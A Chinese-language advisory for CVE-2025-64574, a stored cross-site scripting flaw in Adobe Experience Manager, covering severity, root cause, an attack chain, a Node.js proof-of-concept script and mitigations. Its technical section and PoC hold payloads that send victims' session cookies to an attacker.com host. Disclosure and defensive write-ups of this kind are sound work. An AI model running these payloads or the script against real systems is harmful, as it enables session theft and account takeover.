CVE-2025-64574: Adobe Experience Manager 存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-64574

漏洞类型

存储型跨站脚本攻击（Stored XSS）

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Adobe Experience Manager

漏洞概述

CVE-2025-64574是Adobe Experience Manager中的一个存储型跨站脚本（Stored XSS）漏洞。该漏洞影响Adobe Experience Manager 6.5.23及更早版本。攻击者利用该漏洞可以通过低权限账户在受影响的表单字段中注入恶意JavaScript脚本。由于是存储型XSS，恶意脚本会被永久保存在服务器端，当其他用户浏览包含该漏洞字段的页面时，恶意代码会在其浏览器中自动执行。攻击者可利用此漏洞窃取用户会话cookie、劫持用户账户、进行钓鱼攻击或传播恶意内容。由于漏洞需要用户交互才能触发，攻击复杂度相对较高，但仍对使用受影响版本Adobe Experience Manager的组织构成安全风险。建议受影响的用户尽快升级到Adobe官方发布的安全补丁版本。

技术细节

该存储型XSS漏洞存在于Adobe Experience Manager的表单处理组件中。漏洞的根本原因在于应用程序在处理用户输入时未对特殊字符进行充分的HTML实体编码。攻击者（拥有低权限账户）可以在表单输入字段中嵌入恶意JavaScript代码，如<script>alert(document.cookie)</script>或<img src=x onerror=fetch('https://attacker.com/steal?c='+document.cookie)>。这些恶意载荷会被存储在服务器数据库中，当其他合法用户访问包含该表单字段的页面时，服务器会从数据库中检索并显示这些未经过滤的内容，导致恶意脚本在用户浏览器上下文中执行。由于Adobe Experience Manager通常用于企业级内容管理，攻击成功后攻击者可以获取管理员凭证、访问敏感企业数据或进一步横向移动到其他系统。攻击成功的前提是受害者需要访问包含恶意内容的页面，这通常通过社会工程学手段诱导用户访问特定URL实现。

攻击链分析

STEP 1

步骤1

攻击者获取Adobe Experience Manager的低权限账户访问权限

STEP 2

步骤2

攻击者访问存在漏洞的表单页面，识别可注入恶意脚本的输入字段

STEP 3

步骤3

在表单字段中提交包含恶意JavaScript代码的payload，如<script>标签或事件处理器属性

STEP 4

步骤4

恶意脚本被存储在服务器数据库中，未经过滤或转义处理

STEP 5

步骤5

受害者（普通用户或管理员）访问包含恶意内容的表单页面

STEP 6

步骤6

服务器从数据库检索并向受害者浏览器返回包含恶意脚本的页面内容

STEP 7

步骤7

受害者浏览器执行恶意JavaScript代码，导致会话cookie被窃取或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-64574 Stored XSS PoC for Adobe Experience Manager // This PoC demonstrates injecting malicious JavaScript into vulnerable form fields const axios = require('axios'); // Configuration const targetUrl = 'https://vulnerable-aem-instance.com'; const lowPrivUser = 'attacker'; const lowPrivPass = 'password123'; // Malicious XSS payload const xssPayload = '<script>fetch("https://attacker.com/log?cookie="+document.cookie)</script>'; async function exploit() { console.log('[+] Starting CVE-2025-64574 exploitation...'); // Step 1: Authenticate with low privilege account const authResponse = await axios.post(`${targetUrl}/libs/granite/core/content/login.html`, { j_username: lowPrivUser, j_password: lowPrivPass }, { withCredentials: true }); const sessionCookie = authResponse.headers['set-cookie']; console.log('[+] Authenticated with low privilege account'); // Step 2: Submit form with XSS payload const formEndpoint = `${targetUrl}/content/forms/af/vulnerable-form.html`; await axios.post(formEndpoint, { 'firstName': xssPayload, 'lastName': 'Test User', 'email': '[email protected]' }, { headers: { 'Cookie': sessionCookie }, withCredentials: true }); console.log('[+] Malicious XSS payload stored in form field'); console.log('[+] Payload will execute when any user views the affected form'); console.log('[+] Exploitation complete - waiting for victims'); } exploit().catch(console.error);

影响范围

Adobe Experience Manager 6.5.23及更早版本

Adobe Experience Manager 6.5.x系列所有版本

Adobe Experience Manager Cloud Service（需确认具体受影响版本）

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时缓解措施：1）禁用或限制低权限用户对表单编辑功能的访问；2）在Web应用防火墙（WAF）层面添加XSS过滤规则；3）对所有表单输出实施严格的HTML实体编码（将<、>、"、'等字符转换为对应实体）；4）实施严格的Content Security Policy；5）限制表单字段允许输入的内容类型和长度；6）监控用户提交内容中的可疑模式。建议在业务允许的情况下尽快应用官方安全补丁。